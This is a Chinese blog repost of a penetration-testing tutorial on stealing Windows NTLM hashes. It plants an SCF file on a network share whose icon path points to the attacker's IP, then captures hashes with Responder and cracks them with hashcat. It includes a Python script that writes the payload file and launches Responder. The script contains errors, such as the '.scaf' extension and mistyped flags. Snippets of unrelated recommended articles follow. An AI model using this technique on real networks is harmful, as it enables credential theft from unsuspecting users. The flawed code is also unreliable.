利用sfc文件构建网络渗透

最新推荐文章于 2024-08-12 23:08:43 发布
最新推荐文章于 2024-08-12 23:08:43 发布
阅读量128 收藏
点赞数
文章标签: shell git python
原文链接:http://www.cnblogs.com/haq5201314/p/8634100.html
版权
 

收集哈希

SCF(Shell命令文件)文件可用于执行一组有限的操作,例如显示Windows桌面或打开Windows资源管理器,这并不是什么新鲜事。然而,一个SCF文件可以用来访问一个特定的UNC路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。
代码:
[Shell] Command=2 IconFile=\\攻击者的IP\share\pentestlab.ico [Taskbar] Command=ToggleDesktop
目标机IP:192.168.3.27
攻击者IP:192.168.3. 21

写入文件后保存为@table.scf

 

注:@的意思就是将其置顶
然后在攻击机里开启:responder -wrf --lm -v -I etho 看你的IP选择网络设备
然后将那个文件进行网络共享。只要有人浏览了该文件夹。那么就能获取受害者的hash

 
然后使用hashcat来跑就ok。我们可以用hashidentifier.py来判断Hash类型
------------------------------------------------------------------------------------------------------------------
然后我觉得就这样发布感觉对不起自己,然后就用py写了个脚本。
首先我们来说说实现思路:
1.获取本机IP
2.在指定文件夹内生成*.scaf,并写入exp
3.执行responder -wrf --Im -v -I 网卡设备
实现代码: 
import os
import socket
logo="""
     
    
       _==/          i     i          \==_
     /XX/            |\___/|            \XX\
   /XXXX\            |XXXXX|            /XXXX\
  |XXXXXX\_         _XXXXXXX_         _/XXXXXX|
 XXXXXXXXXXXxxxxxxxXXXXXXXXXXXxxxxxxxXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|
 XXXXXX/^^^^"\XXXXXXXXXXXXXXXXXXXXX/^^^^^\XXXXXX
  |XXX|       \XXX/^^\XXXXX/^^\XXX/       |XXX|
    \XX\       \X/    \XXX/    \X/       /XX/
       "\       "      \X/      "      /"
     """
print logo
def folders():
    global losd
    global ip
    print '[+]Here we will first create a SCAF file .'
    print '[+]Please enter which file you want to create .'
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    low = s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    print '[+]Get to local IP:{}'.format(ip)
    losd=raw_input('position:')
    if os.path.exists(losd) == True:
        print '[+]Folders exist'
    else:
        print '[-]Not Found Folders .'
        exit()
folders()

def scaf():
    try:
      fw=open('{}/@table.scaf'.format(losd),'w')
      payload='''
      [Shell]
      Command=2
      IconFile=\\{}\share\pentestlab.ico
      [Taskbar]
      Command=ToggleDesktop
              '''.format(ip)
      fw.write(payload)
      print '[+]Generating SACF files successfully !'
    except Exception , g:
        print '[-]Error:',g

    try:
        usew=raw_input('Please enter the network device:')
        os.system('responder -wrf --lm -v -I {}'.format(usew))
    except Exception ,l:
        print '[-]Error:',l
scaf()

 运行截图:

 

 

 

转载于:https://www.cnblogs.com/haq5201314/p/8634100.html

weixin_30718391
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SFC的OAM与OAM-SLA
qq_39999982的博客
01-07 363
SFC的ODM与in-situ的ODM 项目笔记-记录ODM,找出ODM和SLA联系 SFC的ODM ODM(操作维护管理),SFC(服务功能连)。SFC的操作主要是在服务层,基于此来定义SFC的OAM框架 1.SFC的OAM监测方面 如下几个方面是SFC必须能够监测到的: 1>服务功能 服务功能可分为SFC可感知的和SFC不可感知的,一个SFC可感知的服务功能就是能够解析带有服务功能转发组件和服务功能子组件的SFC封包,而SFC不可感知的服务功能正好相反,并且需要通过一个单独的具有服务代理功能
OpenStack 业务链networking-sfc介绍 (1) - 概述
赤焰军
03-24 6959
1.  Service Function Chain概述    Neutron的SFC (Service Function Chaining, SFC, 业务链)是由华为主导并开发的一个neutron下的服务框架。    其目的是动态建立服务链使不同租户的流量可以按照不同顺序导向不同的服务功能模块。其概念类似于策略路由, 即SFC使网络报文流量走特定的路径,而不是通过IP目的地址来查看路由表得
SDN中的服务链(SFC)闲聊
04-11 1665
网络场景下,一个数据流通常需要通过多个网络服务设备,例如IDS/IPS,防火墙,LB,等,最终才能到达目的端。这就是服务链(SFC, Service Function Chain)最常用的场景。SFC对于传统硬件网络,或者SDN(什么?你还不知道SDN,那看看这吧SDN闲聊)都是很常见的。但是在传统网络中,SFC存在以下几个问题: 1. 受限于网络拓扑。你的网络服务设备能不能,怎么摆放很大
networking-sfc流程实例解析1
weixin_44088624的博客
12-01 504
openstack测试命令 #创建网络 openstack network create sfc-net-test1 openstack network create sfc-net-test2 openstack network create sfc-net-test3 openstack network create sfc-net-test4 #创建了网 openstack subnet create --network sfc-net-test1 --subnet-range 1.0.0.0/2..
关于SFC无法进行扫描的解决办法
weixin_33909059的博客
03-13 655
有时候系统文件被改变,或中了病毒,我们会用 sfc /scannow这个命令来扫描系统文件并修复,但有很多人这个命令不可用,出现下面的提示: Windows 文件保护无法初始化对受保护的系统文件进行扫描。 指定的错误代码是 0x000006ba [RPC 服务器不可用。 在网上搜索解决办法,搜了很多地方都没有给出确切有效有解决方法,大多都是说RPC...
渗透测试笔记 -------------持续更新中~
00后学编程
08-20 1441
渗透测试 1、Windows基础 脚本(asp 、PHP、jsp)、 html(css、js、html) HTTP协议 CMS(B/S) MDS 肉鸡:被黑客入侵被长期驻扎的及计算机或服务器 抓鸡:利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为 Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制 漏洞:硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改,控制等 一句话【木马】[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(
黑客攻防与网络安全-N-0
weixin_46571036的博客
07-20 1520
章1 入门 黑客:通过攻击来研究漏洞,从而提高系统的安全性 相关术语: 1.肉鸡:(比喻)指代哪些能够被黑客随意操纵的计算机,可以是windows、UNIX、Linux系统,可以是一般的个人计算机,也可以是大型的服务器,并不被对方发觉。 2.木马:伪装成正常的程序,当程序运行时可获得整个系统的运行权限,如灰鸽子、黑洞、PcShare等。 3.网页木马:伪装成一般的网页文件或者将木马代码插入到正常的网页文件中,当访问时,网页木马就会运用对方系统的漏洞主动将配置好的木马客户端下载到对方的计算机上主动运行,从而控
sfc.rar_文件保护
09-14
标题 "sfc.rar_文件保护" 提到的主题是关于如何绕过系统文件保护,而描述中指出使用了PowerBasic编程语言来实现这一目标,并强调这是一个学习方法的过程,且不涉及破坏行为。在这个话题中,我们将深入探讨系统文件...
三菱FX5U固件升级文件 -支持SFC
12-21
【标题】"三菱FX5U固件升级文件 -支持SFC"揭示了本文将深入探讨三菱FX5U系列可编程逻辑控制器(PLC)的固件升级过程,特别是与顺序功能控制(SFC)相关的更新内容。固件是设备或系统的核心软件,它决定了硬件的功能...
电脑软件彻底关闭系统文件保护SFC.rar
10-25
系统文件保护(System File Checker,简称SFC)是Windows操作系统中的一个重要功能,它旨在保护系统核心文件不被未经授权的修改或替换,确保系统的稳定性和安全性。当你尝试执行名为"电脑软件彻底关闭系统文件保护...
SFC.zip_sfc
09-23
综上所述,"SFC.zip_sfc"项目可能是一个涵盖网络编程、数据库管理、前端开发等多个领域的实践项目,对于初学者来说,这是一次宝贵的实践经验,涵盖了构建在线聊天应用的核心技术。通过分析这个压缩包中的文件,可以...
sfc.rar_sfc_sfc收发
09-24
从【压缩包子文件文件名称列表】来看,只有一个文件名“sfc”,推测这是系统的主程序或者包含系统文件文件夹。在实际应用中,可能包含了数据库脚本、应用程序代码、配置文件、用户界面资源等。为了完全理解和...
UnixBench分数计算与多进程测试
qq_39280836的博客
08-08 191
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 907
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
mac修改&保存环境变量
qq_41904572的博客
08-07 94
【代码】zsh和bash修改和保存文件命令。
VB6 SHELL命令中有引号,怎么写?
xinhuanjieyi的博客
08-11 300
需要在命令中包含引号,一种简单的方法是将整个命令字符串用双引号包围起来,并在需要的地方内部使用单引号(如果外部系统或命令支持)。但更常见的是,继续使用双引号,并确保内部的双引号被正确地处理。在VB6中,你可以通过连续使用两个双引号("")来表示字符串中的一个双引号。例如,如果你需要执行一个命令,该命令要求文件路径作为参数,并且这个路径中包含空格和引号,你可以这样做:注意,在cmd。
【busybox记录】【shell指令】uname
最新发布
44083579的博客
08-12 283
uname指令用法
shell编程练习(三)
2301_77279557的博客
08-08 244
常见的shell编程以及自动化脚本
优化边缘计算网络:MEC中SFC部署的挑战与干扰消除算法
1. 资源协同利用:算法需要考虑如何有效地在有限的MEC服务器资源之间进行虚拟网络功能的分发和部署,以优化整体服务性能。这涉及到资源调度和网络功能的合理布局,以确保每个功能在满足服务质量的同时,避免资源浪费...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值